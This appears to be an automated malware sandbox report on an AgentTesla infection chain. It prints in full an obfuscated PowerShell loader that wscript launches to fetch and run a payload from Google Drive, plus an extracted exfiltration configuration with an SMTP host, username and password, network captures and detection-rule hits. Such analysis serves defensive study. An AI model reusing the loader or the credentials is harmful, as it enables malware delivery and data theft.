            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. 
hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl 
BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Frit
            No Snort rule has matched

            AV Detection

            Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
            Source: newfile.exe.824.24.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}
            Source: unknown | HTTPS traffic detected: 142.250.101.113:443 -> 192.168.2.9:49706 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49707 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 142.250.101.113:443 -> 192.168.2.9:49711 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49712 version: TLS 1.2
            Source: Binary string: qm.Core.pdb7 source: powershell.exe, 0000000D.00000002.1839791361.00000000082CF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1836814367.0000000007366000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb_ source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000D.00000002.1839791361.00000000082BA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdbGCTL source: newfile.exe, 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe, 00000018.00000002.2051745191.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe.18.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdb source: newfile.exe, newfile.exe, 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe, 00000018.00000002.2051745191.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe.18.dr

            Software Vulnerabilities

            Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global traffic | TCP traffic: 192.168.2.9:49715 -> 114.142.162.17:26
            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 208.95.112.1
            Source: Joe Sandbox View | IP Address: 114.142.162.17
            Source: Joe Sandbox View | ASN Name: SERVERMULE-AS-APNimbus2PtyLtdAU
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknown | DNS query: name: ip-api.com
            Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-tt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /download?id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-tt&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.usercontent.google.com | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: GET /download?id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
            Source: powershell.exe, 00000005.00000002.1942203516.0000022580552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
            Source: wab.exe, 00000012.00000002.2590450166.0000000022071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
            Source: wab.exe, 00000012.00000002.2590450166.0000000022071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.cash4cars.nz
            Source: powershell.exe, 00000005.00000002.2049632681.000002259006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000D.00000002.1833657924.00000000049A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1836814367.000000000735A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591088547.00000000240E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0R
            Source: wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591088547.00000000240E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: powershell.exe, 00000005.00000002.1942203516.0000022580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1833657924.0000000004851000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2590450166.0000000022071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000000D.00000002.1833657924.00000000049A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1836814367.000000000735A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163757481.000000002411B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591168112.0000000024125000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1962799841.0000000024120000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163989481.0000000024124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163757481.000000002411B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591168112.0000000024125000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1962799841.0000000024120000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163989481.0000000024124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: powershell.exe, 00000005.00000002.1942203516.0000022580001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000D.00000002.1833657924.0000000004851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000005.00000002.1942203516.00000225821F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
            Source: powershell.exe, 00000005.00000002.1942203516.00000225820DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/i
            Source: wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/q
            Source: wab.exe, 00000012.00000002.2573561659.0000000006671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2574645551.0000000006730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q
            Source: powershell.exe, 00000005.00000002.1942203516.0000022580228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-ttP
            Source: powershell.exe, 0000000D.00000002.1833657924.00000000049A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-ttXR
            Source: powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
            Source: powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: wab.exe, 00000012.00000003.2163783606.000000000669E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: wab.exe, 00000012.00000003.2163783606.0000000006671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000668D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000668D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.0000000006671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q&export=download
            Source: powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-tt&export=download
            Source: powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.comzE
            Source: powershell.exe, 0000000D.00000002.1833657924.00000000049A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1836814367.000000000735A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000005.00000002.1942203516.0000022581566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000005.00000002.2049632681.000002259006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 142.250.101.113:443 -> 192.168.2.9:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.101.113:443 -> 192.168.2.9:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49712 version: TLS 1.2

            System Summary

            Source: amsi64_4632.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi32_2080.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 4632, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 2080, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7537
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7537
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. 
hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl 
BeebgSp,eanordknibuld nxan
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF8883EDD01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF8883ECF51
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0750A8C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_021CB589
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_021C4AD0
